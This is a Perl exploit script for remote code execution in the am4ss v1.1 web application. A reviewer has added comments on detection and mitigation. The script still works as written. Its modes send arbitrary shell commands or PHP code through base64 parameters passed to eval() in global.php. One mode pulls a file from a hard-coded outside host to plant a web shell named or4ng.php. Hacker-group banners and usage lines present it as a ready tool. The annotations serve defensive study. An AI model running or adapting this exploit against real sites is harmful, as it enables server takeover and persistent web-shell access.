#!/usr/bin/perl -w
# Exploit Title: am4ss v1.1 Remote Code Execution
# Version: 1.1
# Author : Or4nG.M4n & i-Hmx < Dev Exploit
# Big Thnks 2 : i-Hmx , sA^Dev!L
# Big dicks to : Duck lamerz Team :))
# Tested on: Windows 8
#
# Reviewer summary (defensive reading of this listing)
# -----------------------------------------------------
# What the script does: every mode sends one kind of HTTP GET request,
#     <base-url>/<path>global.php?fa=<base64 PHP>&bn=eval(base64_decode($fa));;
# NOTE(review): this implies the application's global.php passes the `bn`
# request parameter to PHP eval() with `fa` reachable as $fa; the server-side
# code is not shown here, so confirm against the am4ss v1.1 source.
#
# Detection: the payload travels in the query string of a GET request, so it
# is recorded in ordinary web-server access logs. Look for requests to
# global.php carrying both an `fa` parameter holding a base64 blob and a `bn`
# parameter containing `eval(base64_decode(`. The -up mode additionally
# leaves a file named or4ng.php next to global.php.
#
# Mitigation: request parameters must never reach eval(); the fix belongs in
# the application. Until it is patched or removed, block or alert on the
# request shape above at the web server / WAF and check the application
# directory for or4ng.php and other unexpected .php files.
#
# Code notes: warnings are on (-w) but there is no `use strict`; all
# variables except $content are package globals. LWP::UserAgent is loaded
# but not referenced in the visible code; get() comes from LWP::Simple.
use MIME::Base64;
use LWP::UserAgent;
use LWP::Simple;
# About ..
# Banner printed unconditionally at start-up.
print q( anti.virus.team | Or4nG.M4n | alm3refh.cOm Group _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | in the name of /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| | Sp Thnks 2 : sA^Dev!L , i-Hmx , h311 c0d3 , xSs m4n | | Gr33tz : SarBoT511 , Dr.Silv3r , Demetre , Lagripe-Dz | | Mr.DH , x-Sh4dow , Pir4t3 , b0x , SadhaCker , r00t3r | +--------------------------------------------------------+ | Home :~# 1337s.cc , tryag.cc , sec4ever , r00t-s3c.com | +--------------------------------------------------------+ );
# start
# Mode "-cm": wraps an operator-typed command in a PHP call and sends it.
# The string "-cm" is used as an unanchored regex, so any first argument
# that merely contains "-cm" selects this mode.
if($ARGV[0] =~ "-cm"){
    $a1 = $ARGV[1];    # base URL of the target site
    $a2 = $ARGV[2];    # path below the base URL where global.php lives
    print " Please select function to use [system , exec , shell_exec] function# ";
    $func =<STDIN>;
    # Interactive loop, capped at 1000 requests.
    for($faris=0;$faris<1000;$faris++)
    {
        print " Command# ";
        $execut =<STDIN>;
        # PHP source text of the form  <function>('<command>');
        $exec = $func."('".$execut."');";
        $cmd = encode_base64($exec);
        # "\x2F" is "/". `fa` carries the base64 PHP; `bn` is the fixed
        # decode-and-eval expression described in the header.
        $ex = $a1 ."\x2F". $a2 ."global.php?fa=". $cmd ."&bn=eval(base64_decode(\$fa));;";
        # LWP::Simple::get returns undef when the request fails.
        my $content = get $ex;
        if(!$content){
        }else{
            print "\nExecuting cmd ..\n\n";
        }
        # Printed even when $content is undef (warns under -w).
        print $content;
    }
}
# End
#injection func
# Mode "-ev": sends operator-typed PHP as-is and appends each response body
# to a local file named by the operator.
if($ARGV[0] =~ "-ev"){
    $a1 = $ARGV[1];    # base URL of the target site
    $a2 = $ARGV[2];    # path below the base URL where global.php lives
    print "Write PHP code to be executed on the remote site [ don't use <? or ?> ] Example:phpinfo();";
    print " choose file to dump the results in (eg 1337s.htm) File name# ";
    $myf =<STDIN>;
    # Interactive loop, capped at 1000 requests.
    for($faris=0;$faris<1000;$faris++)
    {
        print "Eval# ";
        $evalcode =<STDIN>;
        $evalencoded = encode_base64($evalcode);
        # Same request shape as the -cm mode.
        $strike = $a1 ."\x2F". $a2 ."global.php?fa=". $evalencoded ."&bn=eval(base64_decode(\$fa));;";
        my $content = get $strike;
        if(!$content){
        }else{
            print "\nDumping Results\n\n";
        }
        # Two-argument open in append mode on a bareword handle; the return
        # value is not checked, so a failed open is silent.
        open(lst,">>$myf\n");
        print lst"$content\n";
        close(lst);
    }
}
#ended
# Mode "-up": sends one fixed payload. The base64 literal decodes to PHP
# that opens or4ng.php for writing, fetches a text file from a hard-coded
# third-party URL with file_get_contents(), and writes it into that file.
# Defender takeaway: an or4ng.php file appearing beside global.php, or an
# outbound HTTP fetch made by the PHP process, indicates this mode was used.
if($ARGV[0] =~ "-up"){
    $a1 = $ARGV[1];    # base URL of the target site
    $a2 = $ARGV[2];    # path below the base URL where global.php lives
    $ex = $a1."\x2F".$a2."global.php?fa=JGZpbGUgPSBmb3Blbigib3I0bmcucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vdHJhdjFhbi50MzUuY29tL3I1dC50eHQiKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICwkc2EpOw==&bn=eval(base64_decode(\$fa));;";
    my $content = get $ex;
    print "Exploiter\n";
    sleep(4);
    # Success is reported unconditionally; $content is never inspected.
    print "done .. > $a1 $a2 > or4ng.php < shell.php Enjoy";
}
# Usage banner.
# NOTE(review): the pattern is the empty string. In Perl an empty pattern
# either matches any string or reuses the last successfully matched pattern,
# so this branch appears to run on every invocation, including after one of
# the modes above. Confirm before relying on it.
if($ARGV[0] =~ ""){
    print q( anti.virus.team | Or4nG.M4n _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | +-----in the name of /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| | Upload Shell Use : perl am4ss.pl -up http://localhost/ Path/ | | Cmd By Functions : perl am4ss.pl -cm http://localhost/ Path/ | | Eval php code : perl am4ss.pl -ev http://localhost/ Path/ | +--------------------------------------------------------------+ );
}
# Coded By Or4nG.M4n ..